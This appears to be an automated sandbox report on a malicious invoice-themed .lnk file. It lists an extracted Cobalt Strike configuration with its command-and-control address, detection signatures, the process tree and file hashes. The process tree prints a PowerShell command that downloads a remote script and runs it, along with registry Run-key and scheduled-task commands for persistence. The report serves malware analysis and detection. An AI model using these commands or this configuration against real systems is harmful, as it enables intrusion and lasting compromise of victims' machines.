Analysis
-
max time kernel
146s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted
06-02-2023 16:45
Static task
static1
Behavioral task
behavioral1
Sample
Overdue_Invoice_2023B.pdf.lnk
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Overdue_Invoice_2023B.pdf.lnk
Resource
win10v2004-20221111-en
General
-
Target
Overdue_Invoice_2023B.pdf.lnk
-
Size
1KB
-
MD5
094815ab6988cda2101381cbeeb0056e
-
SHA1
df5f22ce9d8e0ee3ebca101f5112c6456088d317
-
SHA256
0135c4f45de3e2187708033da3135210b03c9db4275dfa794dbcbff21b4f4df9
-
SHA512
c8f3aae210a0157275c0f24e9175ef9d508c55fd5c8e48e6c10e95a79a9f41927d5574dc5197c9594f6fbfefe3eb19f851570c6bb5e0eaecd6311731e26e4363
Malware Config
Extracted
cobaltstrike
987654321
http://185.225.74.52:443/favicon.js
-
access_type
512
-
beacon_type
2048
-
host
185.225.74.52,/favicon.js
-
http_header1
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
-
http_header2
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
-
http_method1
GET
-
http_method2
POST
-
jitter
9472
-
polling_time
55991
-
port_number
443
-
sc_process32
%windir%\syswow64\dllhost.exe
-
sc_process64
%windir%\sysnative\dllhost.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMEuNG3asVOp+bgSmSog10bB55R9e+aj5dF2sVbnRjA/dTkltRdDD0DdF5vJh/gURBikZ4FxqqmfqR2SPAheOzDDrYvV7ScpwPkZe8IUd/DbJmPs30ST9SGHn+eLjTQQEU+I142t7yTsO7HCKf1CTDMHfS3PNoz3V8ivNRwL1aiQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
9.63976192e+08
-
unknown2
AAAABAAAAAIAAANxAAAAAwAAAA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
uri
/btn_bg
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/42.0.2311.135
-
watermark
987654321
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
description | pid | process | target process
PID 4988 created 740 | 4988 | RuntimeBroker.exe | Explorer.EXE
PID 4988 created 740 | 4988 | RuntimeBroker.exe | Explorer.EXE
-
Blocklisted process makes network request 2 IoCs
Processes:
flow | pid | process
12 | 2260 | powershell.exe
15 | 2008 | powershell.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | cmd.exe
-
Executes dropped EXE 1 IoCs
Processes:
pid | process
4988 | RuntimeBroker.exe
-
Loads dropped DLL 1 IoCs
Processes:
pid | process
4988 | RuntimeBroker.exe
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftLibrary = "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\\Libraries\\MicrosoftLibrary; Start-Process $env:Public\\Libraries\\MicrosoftLibrary\\RuntimeBroker.exe\"" | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Windows\CurrentVersion\Run | reg.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | AcroRd32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AcroRd32.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies Internet Explorer settings
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | AcroRd32.exe
-
Modifies registry class 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings | powershell.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
pid | process
2260 | powershell.exe (x2)
2008 | powershell.exe (x2)
4988 | RuntimeBroker.exe (x2)
4168 | AcroRd32.exe (x20)
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
Processes:
pid | process
4988 | RuntimeBroker.exe (x2)
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 2260 | powershell.exe
Token: SeDebugPrivilege | 2008 | powershell.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
pid | process
4168 | AcroRd32.exe
-
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
pid | process
4168 | AcroRd32.exe (x6)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 4736 wrote to memory of 2260 | 4736 | cmd.exe | powershell.exe (x3)
PID 2260 wrote to memory of 2008 | 2260 | powershell.exe | powershell.exe (x3)
PID 2008 wrote to memory of 4168 | 2008 | powershell.exe | AcroRd32.exe (x3)
PID 2008 wrote to memory of 5008 | 2008 | powershell.exe | attrib.exe (x3)
PID 4168 wrote to memory of 2280 | 4168 | AcroRd32.exe | RdrCEF.exe (x3)
PID 2008 wrote to memory of 4988 | 2008 | powershell.exe | RuntimeBroker.exe (x2)
PID 2280 wrote to memory of 4088 | 2280 | RdrCEF.exe | RdrCEF.exe (x41)
PID 2280 wrote to memory of 3372 | 2280 | RdrCEF.exe | RdrCEF.exe (x6)
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\Explorer.EXE (depth 1)
Command line: C:\Windows\Explorer.EXE
-
C:\Windows\system32\cmd.exe (depth 2)
Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Overdue_Invoice_2023B.pdf.lnk
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 Invoke-WebRequest 'http://billingservice.hopto.org/UY7G6S/s4Nt4.txt' -UseBasicParsing | Select-Object -Expand Content | powershell
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 4)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe (depth 5)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Invoice.pdf"
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 6)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 7)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CCC5E39B1935A27074417C7D391DD486 --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 7)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=EC913024932E32653059E9D83EBE4273 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=EC913024932E32653059E9D83EBE4273 --renderer-client-id=2 --mojo-platform-channel-handle=1812 --allow-no-sandbox-job /prefetch:1
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 7)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=20364CE6D8CD753AAAE46B895A2D238B --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=20364CE6D8CD753AAAE46B895A2D238B --renderer-client-id=4 --mojo-platform-channel-handle=2176 --allow-no-sandbox-job /prefetch:1
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 7)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B8A79CB2EFA05472B7D094E20F5E8781 --mojo-platform-channel-handle=2552 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 7)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=633CA2CFECBD2A73770EE4E093EC7F0C --mojo-platform-channel-handle=2852 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 7)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C13F44CDE3889523BCB76F1188528526 --mojo-platform-channel-handle=2920 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
C:\Windows\SysWOW64\attrib.exe (depth 5)
Command line: "C:\Windows\system32\attrib.exe" +h C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\RuntimeBroker.exe (depth 5)
Command line: "C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\RuntimeBroker.exe"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Windows\System32\cmd.exe (depth 6)
Command line: /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f
-
C:\Windows\system32\reg.exe (depth 7)
Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f
- Adds Run key to start application
- Modifies registry key
-
C:\Windows\System32\schtasks.exe (depth 6)
Command line: /F /Create /TN Microsoft_Library /sc minute /MO 80 /TR "powershell.exe -WindowStyle hidden -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe
- Creates scheduled task(s)
-
C:\windows\system32\wermgr.exe (depth 2)
Command line: "C:\windows\system32\wermgr.exe"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize 2KB
MD5 f26d40f3fe3b07202462281e3520a8a5
SHA1 38c528ce4457b2bb1fd9aa18597275e4ca6492ef
SHA256 a556110b4c51077cba0f523c08060bb41b3380751311f47f3da03de9cf20bf84
SHA512 2a9af331837bc09e21f06aab4b6ad2a532defd5e0719fe42ea73e5cd44e6262eb2f8df46c07b843d46d457737eceec716829f3a3f7a5fa94282f420ddaed5de4
-
C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\RuntimeBroker.exe
Filesize 100KB
MD5 ba4cfe6461afa1004c52f19c8f2169dc
SHA1 ab8539ef6b2a93ff9589dec4b34a0257b6296c92
SHA256 e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628
SHA512 2c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0
-
C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\UMPDC.dll
Filesize 391KB
MD5 1570c92c1c5f039c438295ac68ff7e82
SHA1 3ee6c1d3582361e8af4efec44b1d1420494ab728
SHA256 b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4
SHA512 fbf28062d81538f814e1a615caf9993aa24e54fd0b7ff84ead7e22002bac0a4c866d334fd445d6c7844289a7310e82a0febd07d7f02536ea51d11f9f884e4992
-
C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\info.txt
Filesize 174KB
MD5 ec5071963e2367e037a45fab530a5458
SHA1 fe9c636957dce8e9d633a5689466041637a70c26
SHA256 d4219b706d7d914ba1e0dc0c32804b522d3b38f0947e3b902a02c35d89f56259
SHA512 81f88a30d73bb468f95a6905c893c9100a2c83d6a69c2712265df0192f8e3400df6ad30e1a567a8472b999af38db8d583b7d234526095f0f4b1a5267081855aa
-
C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\umpdc.dll
Filesize 391KB
MD5 1570c92c1c5f039c438295ac68ff7e82
SHA1 3ee6c1d3582361e8af4efec44b1d1420494ab728
SHA256 b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4
SHA512 fbf28062d81538f814e1a615caf9993aa24e54fd0b7ff84ead7e22002bac0a4c866d334fd445d6c7844289a7310e82a0febd07d7f02536ea51d11f9f884e4992
-
C:\Users\Admin\Downloads\Invoice.pdf
Filesize 6KB
MD5 662e6c1a869b8a4abc54a7ed8bc23088
SHA1 c16f1dfa1f2488072d87f100a7d11ecaf90ca9d4
SHA256 15d2050a1a60c36ae602981ac19e371a6fae40aed0f5aee6334fbcc721e5b140
SHA512 5bd17a8cbbb0a7a9565d434cfc507213c91bfeac4cea6b7ea0908ec71fbbcf9f3956d1b9b6c9059dbd466f5cfa7efa2948bc338a4331401b4c8be1e5343c9c99
-
memory/1032-182-0x0000000000000000-mapping.dmp
-
memory/1172-189-0x0000000000000000-mapping.dmp
-
memory/2008-154-0x0000000008350000-0x0000000008362000-memory.dmp  Filesize 72KB
-
memory/2008-141-0x0000000000000000-mapping.dmp
-
memory/2008-143-0x00000000074C0000-0x0000000007536000-memory.dmp  Filesize 472KB
-
memory/2008-144-0x0000000007790000-0x0000000007826000-memory.dmp  Filesize 600KB
-
memory/2008-145-0x0000000007720000-0x0000000007742000-memory.dmp  Filesize 136KB
-
memory/2008-146-0x00000000087F0000-0x0000000008D94000-memory.dmp  Filesize 5.6MB
-
memory/2008-142-0x00000000064C0000-0x0000000006504000-memory.dmp  Filesize 272KB
-
memory/2008-155-0x0000000008370000-0x000000000837A000-memory.dmp  Filesize 40KB
-
memory/2008-149-0x0000000007AF0000-0x0000000007B22000-memory.dmp  Filesize 200KB
-
memory/2008-150-0x0000000070430000-0x000000007047C000-memory.dmp  Filesize 304KB
-
memory/2008-151-0x00000000707D0000-0x0000000070B24000-memory.dmp  Filesize 3.3MB
-
memory/2008-152-0x0000000007AD0000-0x0000000007AEE000-memory.dmp  Filesize 120KB
-
memory/2008-153-0x0000000007B80000-0x0000000007B8A000-memory.dmp  Filesize 40KB
-
memory/2208-192-0x0000000000000000-mapping.dmp
-
memory/2260-139-0x00000000080F0000-0x000000000876A000-memory.dmp  Filesize 6.5MB
-
memory/2260-137-0x00000000062B0000-0x0000000006316000-memory.dmp  Filesize 408KB
-
memory/2260-133-0x00000000053F0000-0x0000000005426000-memory.dmp  Filesize 216KB
-
memory/2260-140-0x0000000006D90000-0x0000000006DAA000-memory.dmp  Filesize 104KB
-
memory/2260-132-0x0000000000000000-mapping.dmp
-
memory/2260-138-0x00000000068C0000-0x00000000068DE000-memory.dmp  Filesize 120KB
-
memory/2260-134-0x0000000005BA0000-0x00000000061C8000-memory.dmp  Filesize 6.2MB
-
memory/2260-135-0x00000000059F0000-0x0000000005A12000-memory.dmp  Filesize 136KB
-
memory/2260-136-0x00000000061D0000-0x0000000006236000-memory.dmp  Filesize 408KB
-
memory/2280-157-0x0000000000000000-mapping.dmp
-
memory/3256-174-0x0000000000000000-mapping.dmp
-
memory/3256-179-0x00000183D2D70000-0x00000183D2DEE000-memory.dmp  Filesize 504KB
-
memory/3256-176-0x00000183D2C10000-0x00000183D2C54000-memory.dmp  Filesize 272KB
-
memory/3372-166-0x0000000000000000-mapping.dmp
-
memory/3856-172-0x0000000000000000-mapping.dmp
-
memory/4024-181-0x0000000000000000-mapping.dmp
-
memory/4088-163-0x0000000000000000-mapping.dmp
-
memory/4168-147-0x0000000000000000-mapping.dmp
-
memory/4256-186-0x0000000000000000-mapping.dmp
-
memory/4404-184-0x0000000000000000-mapping.dmp
-
memory/4988-167-0x00007FF9E57F0000-0x00007FF9E59E5000-memory.dmp  Filesize 2.0MB
-
memory/4988-158-0x0000000000000000-mapping.dmp
-
memory/4988-194-0x00007FF9E57F0000-0x00007FF9E59E5000-memory.dmp  Filesize 2.0MB
-
memory/5008-156-0x0000000000000000-mapping.dmp